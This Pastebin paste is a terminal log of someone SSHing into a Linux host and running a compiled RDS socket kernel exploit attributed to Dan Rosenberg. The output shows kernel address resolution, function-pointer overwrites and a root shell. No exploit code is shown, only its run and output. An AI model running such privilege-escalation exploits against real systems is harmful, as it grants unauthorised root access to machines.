Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- gabriel@suporte:~$ ssh user@192.168.1.103
- user@192.168.1.103's password:
- [user@bkpmgm ~]$ /teste/teste
- [*] Linux kernel >= 2.6.30 RDS socket exploit
- [*] by Dan Rosenberg
- [*] Resolving kernel addresses...
- [+] Resolved security_ops to 0xc0b3bfc4
- [+] Resolved default_security_ops to 0xc09b4948
- [+] Resolved cap_ptrace_traceme to 0xc058a48c
- [+] Resolved commit_creds to 0xc046059f
- [+] Resolved prepare_kernel_cred to 0xc0460410
- [*] Overwriting security ops...
- [*] Overwriting function pointer...
- [*] Triggering payload...
- [*] Restoring function pointer...
- [*] Got root!
- sh-4.0# whoami
- root
- sh-4.0#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement